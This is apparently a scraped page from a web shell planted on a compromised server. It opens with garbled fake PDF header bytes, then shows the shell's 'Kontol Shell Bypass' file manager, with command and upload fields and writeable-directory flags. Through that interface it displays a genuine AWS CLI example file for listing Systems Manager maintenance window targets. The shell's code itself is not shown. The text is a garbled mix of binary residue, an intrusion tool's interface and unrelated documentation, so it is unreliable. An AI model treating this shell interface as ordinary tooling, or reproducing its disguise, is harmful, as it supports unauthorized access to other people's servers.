%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /usr/share/doc/awscli/examples/ssm/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //usr/share/doc/awscli/examples/ssm/describe-maintenance-window-targets.rst
**Example 1: To list all targets for a Maintenance Window**

The following ``describe-maintenance-window-targets`` example lists all of the targets for a maintenance window. ::

    aws ssm describe-maintenance-window-targets \
        --window-id "mw-06cf17cbefEXAMPLE"

Output::

    {
        "Targets": [
            {
                "ResourceType": "INSTANCE",
                "OwnerInformation": "Single instance",
                "WindowId": "mw-06cf17cbefEXAMPLE",
                "Targets": [
                    {
                        "Values": [
                            "i-0000293ffdEXAMPLE"
                        ],
                        "Key": "InstanceIds"
                    }
                ],
                "WindowTargetId": "350d44e6-28cc-44e2-951f-4b2c9EXAMPLE"
            },
            {
                "ResourceType": "INSTANCE",
                "OwnerInformation": "Two instances in a list",
                "WindowId": "mw-06cf17cbefEXAMPLE",
                "Targets": [
                    {
                        "Values": [
                            "i-0000293ffdEXAMPLE",
                            "i-0cb2b964d3EXAMPLE"
                        ],
                        "Key": "InstanceIds"
                    }
                ],
                "WindowTargetId": "e078a987-2866-47be-bedd-d9cf4EXAMPLE"
            }
        ]
    }

**Example 2: To list all targets for a maintenance window matching a specific owner information value**

This ``describe-maintenance-window-targets`` example lists all of the targets for a maintenance window with a specific value. ::

    aws ssm describe-maintenance-window-targets \
        --window-id "mw-0ecb1226ddEXAMPLE" \
        --filters "Key=OwnerInformation,Values=CostCenter1"

Output::

    {
        "Targets": [
            {
                "WindowId": "mw-0ecb1226ddEXAMPLE",
                "WindowTargetId": "da89dcc3-7f9c-481d-ba2b-edcb7d0057f9",
                "ResourceType": "INSTANCE",
                "Targets": [
                    {
                        "Key": "tag:Environment",
                        "Values": [
                            "Prod"
                        ]
                    }
                ],
                "OwnerInformation": "CostCenter1",
                "Name": "ProdTarget1"
            }
        ]
    }

For more information, see `View Information About Maintenance Windows (AWS CLI) <https://docs.aws.amazon.com/systems-manager/latest/userguide/maintenance-windows-cli-tutorials-describe.html>`__ in the *AWS Systems Manager User Guide*.

Kontol Shell Bypass